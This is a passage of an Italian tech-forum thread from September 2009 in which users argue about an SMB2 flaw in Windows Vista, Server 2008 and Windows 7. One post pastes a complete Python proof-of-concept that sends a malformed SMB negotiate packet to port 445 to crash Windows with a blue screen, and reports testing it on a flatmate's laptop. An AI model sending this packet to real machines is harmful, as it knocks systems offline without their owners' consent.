|
|
|
![]() |
|
Strumenti |
![]() |
#41 | |
Bannato
Iscritto dal: Aug 2009
Messaggi: 369
|
Quote:
nessuno lavora con un Os RC.Quando WIn7 sara' uscito e la gente lo comprera' ed usera' per lavorare questa falla sara' risolta Ultima modifica di Curtis : 09-09-2009 alle 18:32. |
|
![]() |
![]() |
![]() |
#42 | |
Bannato
Iscritto dal: Jan 2003
Città:
Messaggi: 4421
|
Quote:
...quotate se condividete... ...ciao Andrea... |
|
![]() |
![]() |
![]() |
#43 |
Senior Member
Iscritto dal: Sep 2001
Messaggi: 1041
|
Raga, ma a nessuno di quelli che tra voi stanno testando Windows 7 è capitato che crashasse il sistema e al riavvio il desktop fosse scomparso?
|
![]() |
![]() |
![]() |
#44 |
Senior Member
Iscritto dal: Sep 2002
Messaggi: 2555
|
Allora la notizia doveva titolarsi:
"Trovata falla di sicurezza in Windows VIsta e Win 2008" E poi nell'articolo dire che il problema c'è anceh su un prodotto ceh deve ancora uscire però fa molto più scoop e genera moto trollismo titolare così. A volte mi chiedo con che testa mettano certi tiolo. Forse fanno apposta. Forse che i moderatori non abbiano nulla da fare? |
![]() |
![]() |
![]() |
#45 | |
Senior Member
Iscritto dal: Apr 2004
Città: Livorno
Messaggi: 6612
|
Quote:
Il fatto è che non hai citato né fonti né dati di alcun tipo, hai solo detto "spannometricamente" che la maggior parte dei bug li trova gente esterna a Microsoft, dicendo che "è un dato di fatto" (sic). Ti si è già detto che questo è impossibile da verificare, quindi commenti del genere lasciano il tempo che trovano. Nello specifico c'è in fondo da rallegrarsi, perché se un bug "da news" non fa altro che mostrare un BSOD, allora non siamo messi affatto male, anzi. E ci sono voluti 2 anni di Vista per trovare la falla, segno che non era affatto facile da ravvisare. Se tutti gli altri OS avessero puntati addosso tutti gli occhi che ha Microsoft davvero non so quanto ne uscirebbero sicuri agli occhi della gente... ma non mi pronuncio. Solo, non facciamo passare la Microsoft per una manica di incompetenti.
__________________
![]() |
|
![]() |
![]() |
![]() |
#46 | |
Senior Member
Iscritto dal: Apr 2004
Città: Livorno
Messaggi: 6612
|
Quote:
Forse si sarebbe scatenata comunque, ma questo è un sito serio e possiamo fare a meno di titoli "attira-click". Probabilmente un titolo come "Bug in SMB2, BSOD per Windows 2008, Vista e Seven" non avrebbe attratto la stessa quantità di gente.
__________________
![]() Ultima modifica di MaxArt : 09-09-2009 alle 13:50. |
|
![]() |
![]() |
![]() |
#47 | |
Bannato
Iscritto dal: Aug 2009
Messaggi: 369
|
Quote:
No, significa che compilano software con funzionalita' malevola perche' hanno appunto interesse a compilare questo genere di software per Windows e non per Linux ad esempio che ha una percentuale di home user che lo usa ridicola dove quindi questi software avrebbero un impatto ridicolo .Il criminale o l'hacker agisce e sta addosso sempre all'Os su cui potrebbe poi ricavarne il maggior tornaconto .Sta poi a te non far installare questi software -baggianate sul sistema mache te lo dico a fa' Ultima modifica di Curtis : 09-09-2009 alle 13:51. |
|
![]() |
![]() |
![]() |
#48 | ||
Senior Member
Iscritto dal: Mar 2002
Città: Provincia di Varese
Messaggi: 5096
|
Quote:
Quote:
|
||
![]() |
![]() |
![]() |
#49 | |
Senior Member
Iscritto dal: Nov 2001
Città: Bastia Umbra (PG)
Messaggi: 6384
|
Quote:
![]() ![]()
__________________
:: Il miglior argomento contro la democrazia è una conversazione di cinque minuti con l'elettore medio :: |
|
![]() |
![]() |
![]() |
#50 | ||
Senior Member
Iscritto dal: Mar 2007
Città: Provincia di FC
Messaggi: 1807
|
Quote:
![]() Quote:
![]()
__________________
Lenovo Thinkpad T480s | Steam Deck 256GB | iPhone 14 128GB Ho trattato positivamente con: pupgna,pikerunner,Maldo,Sawato Onizuka,A-ha,darkfable,il.principino |
||
![]() |
![]() |
![]() |
#51 | |
Senior Member
Iscritto dal: Feb 2006
Città: Modena
Messaggi: 1189
|
x Curtis
Quote:
Prima di tutto molti dei commenti hai quali hai risposto erano chiaramente ironici e non si capisce perchè tu abbia replicato con tanta violenza. In secondo luogo forse sei tu che non sei ben informato e che deve moderare quello che scrive. (mi riferisco ai primi post quelli successivi non li ho letti) Sai che RTM sta per Release to manufacturing (Versione per la produzione)? e che indica che è la versione FINALE del SO che viene inviato alle fonderie (non so il nome esatto) che masterizzano e inscatolano i CD per la vendita. Sei al corrente che la RTM di Windows 7 è stata UFFICIALMENTE rilasciata da Microsoft ed è accessibile ai possessori di un account TechNet Plus e MSDN dal 14/08/2009. Quindi test e commenti sulla RTM di Windows 7 sono perfettamente possibili ora senza dover aspettare il 22 Ottobre. Ne consegue che qualunque patch o modifica successiva deve essere scaricata dal sito con Windows Update 30 secondi dopo aver installato il sistema operativo. Una prassi normale al giorno d'oggi ma che francamente non mi piace. Inoltre come già segnalato il bug in oggetto era presente anche in Vista e non occorre molto a controllare se su Win7RTM è presente un bug già visto e conosciuto su vista. CIAO Ultima modifica di mail9000it : 09-09-2009 alle 14:09. |
|
![]() |
![]() |
![]() |
#52 |
Senior Member
Iscritto dal: Nov 2001
Città: Cagliari
Messaggi: 1134
|
Sono convinto che anche i tanto blasonati Linux e Mac OS X (che comunque considero SO di altissimo livello, così come Windows 7) avranno un'immensità di falle di sicurezza.
La differenza è che su Windows si concentrano tutti gli attacchi e l'attenzione generale per il semplice fatto che è il più diffuso. L'importante comunque è la rapidità con la quale si rilasciano patch critiche. Ultima modifica di xsim : 09-09-2009 alle 14:12. |
![]() |
![]() |
![]() |
#53 |
Member
Iscritto dal: Dec 2005
Messaggi: 116
|
perchè con microsoft i problemi si chiamano falle e le soluzioni alle falle per mac si chiamano novità?!?!?
|
![]() |
![]() |
![]() |
#54 |
Senior Member
Iscritto dal: Aug 2006
Messaggi: 11124
|
mica tanto ancora prima di salpare...è salpato da mesi ormai...
Chiunque con scopi malevoli avrebbe avuto parecchio tempo per cercare falle...
__________________
PC1: LG 34UC79G - Ryzen 5600@4,65ghz CO-30 - MasterLiquid 240 - 32GB 2400 Corsair@3000 - Gigabyte GA-AB350M Gaming 3 - RX 6700XT - NZXT S340 Elite PC2: FX6300 - AC Freezer 64 pro - Gigabyte 990XA-UD3 - Sapphire HD7850 2gb - 8gb DDR3 Corsair 1333 - - Antec Two Hundred PC3: AMD A10 7700k - 8gb DDR3 2400mhz - SanDisk Plus SSD 240gb - CoolerMaster NSE-200-KKN1 |
![]() |
![]() |
![]() |
#55 | |
Senior Member
Iscritto dal: Jan 2007
Messaggi: 511
|
Quote:
P.S. per sdrammatizzare...... ![]() |
|
![]() |
![]() |
![]() |
#56 |
Senior Member
Iscritto dal: Oct 2006
Messaggi: 453
|
Ma avete dato un'occhiata allo script prima di dar fiato alle trombe?
Codice:
# SecurityReason Note : # Tested on : Windows Vista SP2 full updated - US-en # #!/usr/bin/python # When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a # PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D from socket import socket from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close() La mia prova, attacco effettuato da macOs 10.6, macchine attaccate: 1-notebook del coinquilino con Vista Business SP2, ovviamente condivisione attiva (impostato su rete domestica in centro connessioni), BSOD PAGE_FAULT_IN_NONPAGED_AREA e riavvio. 2-mio notebook con 7 professional RTM (MSDNAA), l'invio del "buff" non sortisce effetto alcuno, non crasha nemmeno il driver SRV2.SYS, eppure arriva tutto a destinazione in quanto non arrivano errori dalla libreria socket. Quindi sono vulnerabili solo Vista e Server2008 (?? o forse no); peraltro non è una vulnerabilità grave in quanto il crash avviene all'arrivo dell'header del pacchetto e non si riesce ad iniettare codice nel corpo. Il driver interpreta l'& nell'header come un page fault e arriva BSOD (quindi non viene creato un page fault, come avviene con la saturazione della nonpaged pool, ma ne viene semplicemente simulato l'effetto), antipatico ma innocuo, risolto in 7 probabilmente spostando il driver SRV2 nella paged pool (dedotto dal fatto che, nei miei test, 7 risulta vulnerabile se il pagefile viene disattivato); chiaramente è sensato aspettarsi una pezza al driver stesso.
__________________
"Una fotografia è il segreto di un segreto. Più cose ti dice, meno ne sai." - Diane Arbus
Il mio album su flickr -> LINK Ultima modifica di Simock85 : 09-09-2009 alle 14:35. |
![]() |
![]() |
![]() |
#57 |
Senior Member
Iscritto dal: Nov 2001
Città: Bastia Umbra (PG)
Messaggi: 6384
|
Le versioni vulnerabili dei sistemi operativi, almeno stando ai primi test, le avevo scritte al secondo post
![]()
__________________
:: Il miglior argomento contro la democrazia è una conversazione di cinque minuti con l'elettore medio :: |
![]() |
![]() |
![]() |
#58 |
Senior Member
Iscritto dal: Jan 2006
Messaggi: 1516
|
Non esiste un SO perfetto ed invulnerabile, xò esistono condizioni affinchè un SO sia + sicuro e - vulnerabile rispetto ad un altro SO. Purtroppo Windows essendo x ragioni commerciali un SO di tipo "close", ha solo tot selezionatissimi ing. ke sn autorizzati ad intervenire ed a kiudere le falle, quindi ci sono meno "occhi" ke vigilano e meno persone ke possono intervenire a correggere gli errori.
|
![]() |
![]() |
![]() |
#59 | |||
Bannato
Iscritto dal: Aug 2009
Messaggi: 369
|
[
Quote:
Quote:
Se poi si va sul sito apple nella sezione Security issue ad ogni aggiornamento di OSx da ben 300MB circa ogni mese e mezzo si vede una lista di vulnerabilta' corrette che sembra un campo di battaglia provare per credere Quote:
Una falla di questo tipo ha solo come fine il far autoinstallare malware di ogni genere sul sistema senza che l'utente ne sia al corrente ( poi come si sa prima che il malware effettivamente si installi deve passare anche il controllo dell'antivirus con la protezione permanente di sistema che lo blocca a priori ) Una falla di remote code execution ( le piu' gravi e che portano all'autoinstallazione di malware sul sistema) si sfrutta con codice exploit dedicato che il cracker crea apposta per sfruttare quella falla di memory corruption & remote arbitrary code execution e serve poi per far autoinstallare il malware , non e' un programmino malware che sfrutta la vulnerabilita', l'autoinstallazione di un programmino malware e' solo la conseguenza che porta lo sfruttamento di una tale vulnerabilita' con dedicato codice exploit Ultima modifica di Curtis : 09-09-2009 alle 18:26. |
|||
![]() |
![]() |
![]() |
#60 |
Messaggi: n/a
|
|
![]() |
![]() |
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 22:03.